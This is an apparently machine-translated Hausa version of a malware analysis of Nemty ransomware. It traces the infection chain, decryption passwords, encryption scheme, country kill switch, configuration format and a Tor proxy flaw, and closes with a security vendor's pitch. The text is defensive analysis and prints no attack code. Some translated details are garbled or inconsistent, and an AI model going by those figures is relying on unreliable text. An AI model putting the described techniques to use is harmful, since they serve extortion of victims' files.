Wani sabon kayan fansa mai suna Nemty ya bayyana akan hanyar sadarwar, wanda ake zaton shine magajin GrandCrab ko Buran. Ana rarraba malware musamman daga gidan yanar gizon PayPal na karya kuma yana da abubuwa masu ban sha'awa da yawa. Cikakkun bayanai game da yadda wannan kayan aikin fansa ke aiki suna ƙarƙashin yanke.
Sabon Nemty ransomware mai amfani ya gano Satumba 7, 2019. An rarraba malware ta hanyar gidan yanar gizo , Hakanan yana yiwuwa don ransomware ya shiga cikin kwamfuta ta hanyar RIG exploit kit. Maharan sun yi amfani da hanyoyin injiniyanci na zamantakewa don tilasta wa mai amfani da shi ya gudanar da fayil ɗin cashback.exe, wanda ake zargin ya karɓa daga gidan yanar gizon PayPal. Har ila yau, yana da sha'awar Nemty ya ƙayyade tashar tashar da ba daidai ba don sabis na wakili na gida, wanda ke hana malware aika aika. bayanai zuwa uwar garken. Don haka, mai amfani zai loda ɓoyayyen fayiloli zuwa cibiyar sadarwar Tor da kansa idan ya yi niyyar biyan fansa kuma ya jira ɓoye bayanan daga maharan.
Abubuwa masu ban sha'awa da yawa game da Nemty sun ba da shawarar cewa mutane ɗaya ne suka haɓaka shi ko kuma ta hanyar yanar gizo masu alaƙa da Buran da GrandCrab.
- Kamar GandCrab, Nemty yana da kwai na Easter - hanyar haɗi zuwa hoton shugaban Rasha Vladimir Putin tare da batsa. GandCrab ransomware na gado yana da hoto mai rubutu iri ɗaya.
- Abubuwan fasahar harshe na duka shirye-shiryen biyu suna nuni ga mawallafin masu magana da Rasha iri ɗaya.
- Wannan shine farkon ransomware don amfani da maɓallin RSA 8092-bit. Ko da yake babu ma'ana a cikin wannan: maɓallin 1024-bit ya isa sosai don karewa daga hacking.
- Kamar Buran, an rubuta kayan fansa a cikin Object Pascal kuma an haɗa su cikin Borland Delphi.
Bincike a tsaye
Kisa na malicious code yana faruwa a matakai hudu. Mataki na farko shine gudanar da cashback.exe, fayil ɗin PE32 mai aiwatarwa a ƙarƙashin MS Windows tare da girman 1198936 bytes. An rubuta lambar sa a cikin Visual C++ kuma an harhada shi a ranar 14 ga Oktoba, 2013. Yana ƙunshe da rumbun adana kayan tarihi wanda ke buɗewa ta atomatik lokacin da kuke gudanar da cashback.exe. Software ɗin yana amfani da ɗakin karatu na Cabinet.dll da ayyukansa FDICreate(), FDDestroy() da sauransu don samun fayiloli daga ma'ajiyar .cab.
SHA-256: A127323192ABED93AED53648D03CA84DE3B5B006B641033EB46A520B7A3C16FC
Bayan cire kayan tarihin, fayiloli uku zasu bayyana.
Bayan haka, an ƙaddamar da temp.exe, fayil ɗin PE32 mai aiwatarwa a ƙarƙashin MS Windows tare da girman 307200 bytes. An rubuta lambar a cikin Visual C++ kuma an shirya shi tare da fakitin MPRESS, fakiti mai kama da UPX.
SHA-256: EBDBA4B1D1DE65A1C6B14012B674E7FA7F8C5F5A8A5A2A9C3C338F02DD726AAD
Mataki na gaba shine ironman.exe. Da zarar an ƙaddamar da shi, temp.exe yana ɓoye bayanan da aka haɗa a cikin temp kuma ya sake suna zuwa ironman.exe, fayil ɗin 32 byte PE544768 mai aiwatarwa. An haɗa lambar a cikin Borland Delphi.
SHA-256: 2C41B93ADD9AC5080A12BF93966470F8AB3BDE003001492A10F63758867F2A88
Mataki na ƙarshe shine sake kunna fayil ɗin ironman.exe. A lokacin aiki, yana canza lambar sa kuma yana gudanar da kansa daga ƙwaƙwalwar ajiya. Wannan sigar ironman.exe na mugunta ce kuma tana da alhakin ɓoyewa.
Kai hari vector
A halin yanzu, ana rarraba Nemty ransomware ta gidan yanar gizon pp-back.info.
Ana iya duba cikakken jerin kamuwa da cuta a sandbox.
saitin
Cashback.exe - farkon harin. Kamar yadda aka riga aka ambata, cashback.exe yana buɗe fayil ɗin .cab ɗin da ya ƙunshi. Sannan yana ƙirƙirar babban fayil TMP4351$.TMP na nau'in %TEMP%IXxxx.TMP, inda xxx shine lamba daga 001 zuwa 999.
Bayan haka, an shigar da maɓallin rajista, wanda yayi kama da haka:
"rundll32.exe" "C:Windowssystem32advpack.dll,DelNodeRunDLL32"C:UsersMALWAR~1AppDataLocalTempIXPxxx.TMP"
Ana amfani da shi don share fayilolin da ba a tattara su ba. A ƙarshe, cashback.exe yana fara tsarin temp.exe.
Temp.exe shine mataki na biyu a cikin sarkar kamuwa da cuta
Wannan shine tsarin da fayil ɗin cashback.exe ya ƙaddamar, mataki na biyu na aiwatar da ƙwayoyin cuta. Yana ƙoƙarin zazzage AutoHotKey, kayan aiki don gudanar da rubutun akan Windows, da gudanar da rubutun WindowSpy.ahk wanda ke cikin sashin albarkatun fayil ɗin PE.
Rubutun WindowSpy.ahk yana warware fayil ɗin ɗan lokaci a cikin ironman.exe ta amfani da RC4 algorithm da kalmar wucewa IwantAcake. Ana samun maɓalli daga kalmar sirri ta amfani da MD5 hashing algorithm.
temp.exe sannan ya kira tsarin ironman.exe.
Ironman.exe - mataki na uku
Ironman.exe yana karanta abubuwan da ke cikin fayil ɗin iron.bmp kuma yana ƙirƙirar fayil ɗin iron.txt tare da cryptolocker wanda za a ƙaddamar a gaba.
Bayan wannan, kwayar cutar ta loda iron.txt cikin ƙwaƙwalwar ajiya kuma ta sake kunna ta a matsayin ironman.exe. Bayan wannan, an share iron.txt.
ironman.exe shine babban ɓangaren NEMTY ransomware, wanda ke ɓoye fayiloli akan kwamfutar da abin ya shafa. Malware yana haifar da mutex mai suna ƙi.
Abu na farko da yake yi shine tantance wurin da kwamfutar take. Nemty yana buɗe mai binciken kuma ya gano IP ɗin a kunne . A shafin [IP]/Name ƙasar an ƙayyade ƙasar daga IP ɗin da aka karɓa, kuma idan kwamfutar tana cikin ɗaya daga cikin yankuna da aka jera a ƙasa, aiwatar da lambar malware:
- Rasha
- Belarus
- Ukraine
- Kazakhstan
- Tajikistan
Mafi mahimmanci, masu haɓakawa ba sa son jawo hankalin hukumomin tilasta bin doka a ƙasashensu na zama, don haka ba sa ɓoye fayiloli a cikin hukunce-hukuncen "gidaje".
Idan adireshin IP na wanda aka azabtar ba ya cikin jerin da ke sama, to kwayar cutar ta ɓoye bayanan mai amfani.
Don hana dawo da fayil, ana share kwafin inuwar su:
Sannan yana ƙirƙirar jerin fayiloli da manyan fayiloli waɗanda ba za a ɓoye su ba, da kuma jerin abubuwan haɓaka fayil.
- windows
- $ SAKE CYCLE.BIN
- RSA
- NTDETECT.COM
- ntara
- MSDOS.SYS
- IO.SYS
- boot.ini AUTOEXEC.BAT ntuser.dat
- tebur.ini
- SYS CONFIG.
- BOOTSECT.BAK
- bootmgr
- programdata
- app data
- osoft
- Fayilolin gama gari
log LOG CAB cab CMD cmd COM com cpl
CPL exe EXE ini INI dll DDL lnk LNK url
URL ttf TTF DECRYPT.txt NEMTY Abun kunya
Don ɓoye URLs da bayanan daidaitawa, Nemty yana amfani da tushe64 da RC4 ɓoye algorithm tare da kalmar fuckav.
Tsarin ɓoye bayanan ta amfani da CryptStringToBinary shine kamar haka
Enciko
Nemty yana amfani da boye-boye mai Layer uku:
- AES-128-CBC don fayiloli. Maɓallin AES 128-bit an ƙirƙira shi ba da gangan ba kuma ana amfani dashi iri ɗaya don duk fayiloli. Ana adana shi a cikin fayil ɗin sanyi akan kwamfutar mai amfani. An ƙirƙiri IV ɗin ba da gangan don kowane fayil kuma an adana shi a cikin rufaffen fayil ɗin.
- RSA-2048 don ɓoye fayil IV. An samar da maɓalli na biyu don zaman. Ana adana maɓalli na sirri don zaman a cikin fayil ɗin daidaitawa akan kwamfutar mai amfani.
- Saukewa: RSA-8192. An gina babban maɓallin jama'a a cikin shirin kuma ana amfani dashi don ɓoye fayil ɗin daidaitawa, wanda ke adana maɓallin AES da maɓallin sirri don zaman RSA-2048.
- Nemty ya fara samar da 32 bytes na bayanan bazuwar. Ana amfani da bytes 16 na farko azaman maɓallin AES-128-CBC.
Algorithm na ɓoye na biyu shine RSA-2048. Maɓallin maɓalli yana samuwa ta aikin CryptGenKey() kuma aikin CryptImportKey() ya shigo da shi.
Da zarar an samar da maɓallai biyu don zaman, ana shigo da maɓallin jama'a cikin Mai ba da Sabis na Cryptographic MS.
Misalin maɓallin jama'a da aka ƙirƙira don zama:
Bayan haka, ana shigo da maɓalli na sirri cikin CSP.
Misalin maɓallin keɓaɓɓen da aka samar don zama:
Kuma na ƙarshe ya zo RSA-8192. Ana adana babban maɓalli na jama'a a cikin rufaffen tsari (Base64 + RC4) a cikin sashin .data na fayil ɗin PE.
Maɓallin RSA-8192 bayan ƙaddamarwa na base64 da RC4 decryption tare da kalmar sirrin fuckav yayi kama da wannan.
A sakamakon haka, gaba dayan tsarin ɓoyewa yayi kama da haka:
- Ƙirƙirar maɓallin AES 128-bit wanda za a yi amfani da shi don ɓoye duk fayiloli.
- Ƙirƙiri IV don kowane fayil.
- Ƙirƙirar maɓalli na biyu don zaman RSA-2048.
- Ƙaddamar da maɓallin RSA-8192 da ke ciki ta amfani da base64 da RC4.
- Rufe abun ciki na fayil ta amfani da AES-128-CBC algorithm daga mataki na farko.
- Sirri na IV ta amfani da maɓallin jama'a na RSA-2048 da tushe64.
- Ƙara rufaffen IV zuwa ƙarshen kowane rufaffen fayil.
- Ƙara maɓallin AES da maɓallin sirri na zaman RSA-2048 zuwa saitin.
- Bayanan daidaitawa da aka bayyana a sashe game da kwamfutar da ta kamu da cutar an ɓoye su ta amfani da babban maɓallin jama'a RSA-8192.
- Fayil ɗin da aka ɓoye yayi kama da haka:
Misalin fayilolin rufaffiyar:
Tattara bayanai game da kwamfutar da ta kamu da cutar
Ransomware yana tattara maɓallai don ɓata fayilolin da suka kamu, don haka maharin na iya ƙirƙirar decryptor a zahiri. Bugu da kari, Nemty na tattara bayanan mai amfani kamar sunan mai amfani, sunan kwamfuta, bayanin martabar hardware.
Yana kiran ayyukan GetLogicalDrives(), GetFreeSpace(), GetDriveType() ayyuka don tattara bayanai game da abubuwan tafiyar da kwamfutar da ta kamu da cutar.
Ana adana bayanan da aka tattara a cikin fayil ɗin daidaitawa. Bayan ƙaddamar da kirtani, muna samun jerin sigogi a cikin fayil ɗin daidaitawa:
Misalin tsarin kwamfuta mai cutar:
Za a iya wakilta samfurin daidaitawa kamar haka:
{"Gaba ɗaya": {"IP":"[IP]", "Kasar":"[Kasar]", "ComputerName":"[ComputerName]", "Sunan mai amfani":"[Sunan mai amfani]", "OS": "[OS]", "isRU": ƙarya, "version":"1.4", "CompID":"{[CompID]}", "FileID":"_NEMTY_[FileID]_", "UserID":"[ UserID]", "maɓalli":"[key]", "pr_key":"[pr_key]
Nemty yana adana bayanan da aka tattara a tsarin JSON a cikin fayil %USER%/_NEMTY_.nemty. FileID yana da tsayin haruffa 7 kuma an ƙirƙira shi ba da gangan ba. Misali: _NEMTY_tgdLYrd_.nemty. Ana kuma haɗa FayilID zuwa ƙarshen ɓoyayyen fayil ɗin.
Saƙon fansa
Bayan ɓoye fayilolin, fayil ɗin _NEMTY_[FileID] -DECRYPT.txt yana bayyana akan tebur tare da abun ciki mai zuwa:
A ƙarshen fayil ɗin akwai ɓoyayyen bayanai game da kwamfutar da ta kamu da cutar.
Sadarwar hanyar sadarwa
Tsarin ironman.exe yana saukar da rarrabawar mai binciken Tor daga adireshin kuma yayi ƙoƙarin shigar dashi.
Daga nan Nemty yayi ƙoƙarin aika bayanan daidaitawa zuwa 127.0.0.1:9050, inda yake tsammanin samun wakili na mai binciken Tor. Koyaya, ta tsohuwa wakilin Tor yana sauraron tashar jiragen ruwa 9150, kuma tashar 9050 Tor daemon ke amfani da shi akan Linux ko Ƙwararrun Ƙwararru akan Windows. Don haka, ba a aika bayanai zuwa uwar garken maharin. Madadin haka, mai amfani zai iya sauke fayil ɗin sanyi da hannu ta ziyartar sabis na ɓarnawar Tor ta hanyar hanyar haɗin da aka bayar a cikin saƙon fansa.
Haɗa zuwa wakili na Tor:
HTTP GET yana ƙirƙirar buƙatun zuwa 127.0.0.1:9050/jama'a/ƙofa?data=
Anan zaka iya ganin buɗaɗɗen tashoshin jiragen ruwa na TCP waɗanda wakilin TORlocal ke amfani da su:
Sabis na ɓoye bayanan Nemty akan hanyar sadarwar Tor:
Kuna iya loda hoto da aka ɓoye (jpg, png, bmp) don gwada sabis ɗin ɓarna.
Bayan wannan, maharin ya nemi ya biya fansa. Idan ba a biya ba farashin ya ninka sau biyu.
ƙarshe
A halin yanzu, ba zai yiwu a ɓoye fayilolin da Nemty suka rufa ba tare da biyan fansa ba. Wannan sigar na ransomware yana da fasali gama gari tare da Buran ransomware da tsohon GandCrab: haɗawa a cikin Borland Delphi da hotuna masu rubutu iri ɗaya. Bugu da ƙari, wannan shine farkon mai ɓoyewa wanda ke amfani da maɓallin RSA 8092-bit, wanda kuma, ba shi da ma'ana, tun da maɓallin 1024-bit ya isa don kariya. A ƙarshe, kuma abin sha'awa, yana ƙoƙarin amfani da tashar tashar da ba daidai ba don sabis na wakili na Tor na gida.
Duk da haka, mafita и hana Nemty ransomware daga isa ga kwamfutocin masu amfani da bayanai, kuma masu samarwa za su iya kare abokan cinikin su da . Cikakkun yana ba da wariyar ajiya ba kawai ba, har ma da kariya ta amfani da shi , fasaha ta musamman dangane da basirar ɗan adam da ilimin halin ɗabi'a wanda ke ba ku damar kawar da malware ko da ba a sani ba.
source: www.habr.com